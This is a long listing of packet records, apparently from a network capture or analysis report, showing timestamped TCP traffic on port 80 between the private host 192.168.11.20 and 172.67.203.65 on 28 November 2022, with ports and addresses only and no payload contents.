Nov 28, 2022 12:46:58.170864105 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170892954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170905113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170916080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170926094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170937061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170948029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170958996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170969963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170980930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170990944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171001911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171013117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171025991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171036959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171047926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171057940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171068907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171076059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171080112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171091080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171142101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171143055 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171153069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171164036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171174049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171184063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171191931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171205044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171221018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171231985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171242952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171256065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171267033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171278000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171278000 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171288013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171298981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171312094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171323061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171333075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171344042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171355009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171386003 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171396017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171406984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171417952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171426058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171437025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171447992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171458006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171468973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171479940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171493053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171504021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171514034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171525002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171552896 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171619892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171649933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.171683073 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.171808958 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.182816982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182882071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182893038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182904005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182914972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182924986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182935953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182965994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182976961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182987928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.182997942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183063984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183074951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183085918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183095932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183106899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183142900 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183149099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183159113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183170080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183223009 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183238029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183248997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183301926 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183326006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183336973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183379889 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183414936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183425903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183434963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183445930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183456898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183466911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183478117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183484077 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183490992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183501959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183512926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183522940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183533907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183545113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183556080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183566093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183619022 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183672905 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183819056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183825016 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.183830976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183841944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183851957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183862925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183873892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183883905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183895111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183904886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183916092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183927059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183937073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183948040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183957100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183968067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183978081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183989048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.183999062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184010029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184012890 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184020996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184031010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184041977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184051991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184062004 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184070110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184082031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184092999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184111118 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184184074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184195995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184206009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184216976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184227943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184238911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184247971 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184248924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184259892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184271097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184281111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184292078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184304953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184317112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184340954 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184346914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184361935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184386015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184391975 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184396982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184406996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184417963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184439898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184452057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184462070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184473038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184484005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184489965 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184494019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184504986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184515953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184525967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184536934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184545040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184547901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184559107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184570074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184581041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184592009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184694052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.184724092 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.184832096 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.191685915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191797018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191808939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191819906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191860914 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.191884995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191901922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191915035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191926003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191936970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191953897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191966057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191976070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.191987038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192001104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192011118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192013979 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192022085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192033052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192043066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192078114 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192148924 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192215919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192222118 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192226887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192238092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192249060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192260027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192270994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192281008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192290068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192301035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192354918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192373037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192389965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192405939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192428112 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192476034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192476988 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192493916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192512035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192528963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192545891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192563057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192580938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192589998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192599058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192616940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192652941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192670107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192687988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192735910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192754030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192770958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192787886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192806005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192811012 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192823887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192842007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192858934 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192859888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.192977905 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.192992926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.193006039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.193017006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.193103075 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.193219900 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.200918913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201018095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201069117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201081038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201091051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201103926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201122999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201134920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201145887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201179028 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201179028 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201205969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201216936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201227903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201237917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201248884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201260090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201261044 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201282978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201293945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201304913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201316118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201325893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201337099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201344013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201373100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201385021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201395035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201406002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201416016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201426983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201440096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201451063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201483965 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201509953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201520920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201531887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201543093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201554060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201565027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201570034 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201575994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201586962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201597929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201608896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201620102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201630116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201641083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201652050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201663017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201792955 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201855898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.201894999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201905966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201916933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201927900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201941013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201951981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201962948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201972008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201982975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.201996088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.202007055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.202018023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.202095032 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.202198982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.208946943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209122896 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.209237099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209252119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209264040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209279060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209290981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209304094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209316015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209358931 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.209374905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209384918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209489107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.209568977 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.209827900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209935904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209947109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.209960938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210000992 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.210021973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210032940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210043907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210055113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210066080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210077047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210088015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210098028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.210119963 CET	49836	80	192.168.11.20	172.67.203.65
